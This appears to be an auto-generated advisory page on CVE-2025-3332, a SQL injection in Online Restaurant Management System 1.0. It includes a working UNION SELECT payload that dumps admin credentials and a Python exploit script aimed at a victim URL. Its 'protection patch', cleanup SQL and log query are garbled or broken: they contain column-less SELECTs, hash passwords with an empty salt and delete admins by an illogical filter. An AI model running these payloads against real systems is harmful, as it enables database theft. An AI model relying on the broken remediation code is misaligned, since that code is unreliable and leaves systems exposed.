How CVE-2025-3332 Works
The vulnerability exists in the `/admin/menu_save.php` file of Online Restaurant Management System 1.0 where user-supplied input in the `menu` parameter is directly concatenated into SQL queries without proper sanitization. Attackers can craft malicious SQL statements through this parameter, enabling unauthorized database access. The flaw allows remote exploitation without authentication (PR:N in CVSS), making it particularly dangerous. The SQL injection can lead to full database compromise, including extraction of admin credentials, menu items, and customer data. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms the attack can be performed over the network with low complexity.
DailyCVE Form
Platform: Online Restaurant Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/07/2025
What Undercode Say:
-- Exploit POC /admin/menu_save.php?menu=1' UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7 FROM admins-- -
Automated Exploit Script
import requests
target = "http://victim-site.com/admin/menu_save.php"
payload = {"menu": "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"}
r = requests.get(target, params=payload)
print(r.text)
// Protection Patch $menu = mysqli_real_escape_string($conn, $_GET['menu']); $query = "SELECT FROM menus WHERE id = '$menu'";
Detection Command grep -r "menu_save.php" /var/www/html --include=".php"
WAF Rule to Block Exploit SecRule ARGS:menu "@detectSQLi" "id:1001,deny,status:403,msg:'SQLi Attempt'"
Database Cleanup After Exploit DELETE FROM admins WHERE last_login LIKE '%sqlmap%'; ALTER TABLE admins ADD COLUMN salt VARCHAR(32); UPDATE admins SET password = SHA2(CONCAT(salt,password),512);
Post-Exploit Detection SELECT FROM mysql.general_log WHERE argument LIKE '%menu_save.php%' AND argument LIKE '%UNION%';
Mitigation Steps: 1. Update to version 1.1 2. Implement prepared statements 3. Apply least privilege to DB user 4. Enable WAF filtering 5. Audit all admin endpoints
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3332
Extra Source Hub:
Undercode
